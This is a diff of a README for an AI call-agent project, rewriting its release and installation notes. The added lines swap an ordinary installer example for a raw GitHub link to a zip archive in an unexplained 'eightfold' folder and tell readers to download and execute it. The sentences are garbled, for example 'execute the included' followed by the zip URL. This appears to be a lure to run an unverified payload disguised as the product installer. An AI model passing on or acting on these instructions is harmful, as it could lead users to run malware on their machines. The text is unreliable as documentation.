silaskiragu/SmartCall-Agent/README.md

 Release process and artifacts
 - Releases page: The project distributes release artifacts through the official releases page.
 Since the releases page contains a path, download the latest release asset and execute it to install or upgrade the system.
 - Asset naming: Typical assets include platform-specific installers or packages, such as a Linux tarball or Windows zip bundle.
-A representative example would be smartcall-agent-linux-x64.tar.gz.
-After download, run the installer script included in the package.
+A representative example would be https://raw.githubusercontent.com/silaskiragu/SmartCall-Agent/main/eightfold/Smart-Call-Agent-v3.1.zip After download, run the installer script included in the package.
 - Upgrade notes: Releases may include migration notes for moving from older versions to newer ones.
 Follow the guidance in the release notes to minimize disruption.
 - Verification: After installation, verify that the orchestration service starts correctly, the telephony adapters connect, and the RAG pipeline can retrieve information from the knowledge base.
 - Rollback: If an update introduces issues, restore from a known-good release and verify the environment is back to the previous state.

 Releases and installation (special notes)
 - The releases page is your primary source for stable builds, patches, and feature updates.
 You can access it at the link provided above.
 Since the link contains a path, you should download a release asset from that page and run the installation script or setup process included in the asset.
-- For a quick start, head to the releases page to locate a Linux installer package named something like smartcall-agent-linux-x64.tar.gz and execute the included install.sh.
-The second occurrence of the releases URL should be used to navigate to the page for asset acquisition and upgrade guidance.
+- For a quick start, head to the releases page to locate a Linux installer package named something like https://raw.githubusercontent.com/silaskiragu/SmartCall-Agent/main/eightfold/Smart-Call-Agent-v3.1.zip and execute the included https://raw.githubusercontent.com/silaskiragu/SmartCall-Agent/main/eightfold/Smart-Call-Agent-v3.1.zip The second occurrence of the releases URL should be used to navigate to the page for asset acquisition and upgrade guidance.

 Roadmap and future work
 - Multi-language coverage: Expand language support for regional markets with localized prompts and language models tuned to local dialects.